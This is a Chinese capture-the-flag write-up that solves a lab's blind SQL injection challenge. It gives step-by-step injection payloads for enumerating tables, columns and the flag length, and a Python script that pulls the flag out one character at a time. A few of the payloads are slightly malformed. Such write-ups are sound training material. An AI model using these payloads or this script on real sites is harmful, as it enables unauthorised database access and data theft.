實驗吧第二題 who are you? 很有意思,過兩天好好分析寫一下。簡單的SQL注入之3也很有意思,適合做手工練習,詳細分析見下。
http://ctf5.shiyanbar.com/web/index_3.php 隨便輸入111' 便報錯,由報錯內容可知較多信息:
通過 1' and '1'='1 返回正確, 1' and '1'='2 返回錯誤可知,當輸入正確值的時候返回hello,輸入錯誤值無顯示,且過濾了sleep()。
進行猜解表名: 方法一:1' and (select count(*) from 表名) > 0 # 即 http://ctf5.shiyanbar.com/web/index_3.php?id=1%27+and+exists(select+*+from+表名)+%3E+0+%23
方法二: 1' and (select count(*) from aaa) > 0 # 即 http://ctf5.shiyanbar.com/web/index_3.php?id=1%27+and+%28select+*+from+aaa%29+%3E+0+%23 報錯可得數據庫為“web1”。
通過fuzz,可知存在flag表
再利用1' and(select count(*) from information_schema.columns where table_schema='web1' and table_name='flag') > 1 # ,返回正確,>2 無返回,可知flag表有2列,
即http://ctf5.shiyanbar.com/web/index_3.php?id=1%27+and%28select+count%28*%29+from+information_schema.columns+where+table_schema%3D%27web1%27+and+table_name%3D%27flag%27%29+%3E+3+%23
猜列名: 1' and (select 列名 from flag) > -1# 或1'union select 列名 from flag,放在burp中進行爆破,列名存在輸出hello,不存在就報錯。如下,存在flag和id兩列
猜字段長度: 1'+and(select+length(flag)+from+flag)>25%23# 和 1'+and(select+length(flag)+from+flag)>27%23#,大於25返回hello即正確,小於27返回空即錯誤,可知一共有26個字符。
猜字段: 1'and ascii(substr(select flag from flag),1,1)= 110#
將上面的payload2 按照數值排序為:102 108 97 103 123 89 48 117 95 64 114 51 95 53 79 95 100 65 109 110 95 57 48 79 100 125,利用burp自帶轉碼工具轉換(先hex,然后ascii)即可得flag{Y0u_@r3_5O_dAmn_90Od}
附一個python3的腳本及運行截圖:
#!/usr/bin/env python3 #coding:utf-8 import sys import re import urllib.request import http.client headers = {'Content-Type': 'application/x-www-form-urlencoded'} flag = '' print("Start SQLi") for i in range(1,27): for payload in range(30,127): sys.stdout.write('.') sys.stdout.flush() conn = http.client.HTTPConnection('ctf5.shiyanbar.com',timeout=60) s = "/web/index_3.php?id=1'+and+ascii(substr((select+flag+from+flag)%2C{0}%2C1))+%3D{1}%23".format(i,payload) conn.request(method='GET',url=s,headers=headers) response = conn.getresponse().read().decode('utf-8') conn.close() if response.find(str('Hello')) >0: flag += chr(payload) print(i,chr(payload)) break print('Done! flag is {0}'.format(flag))
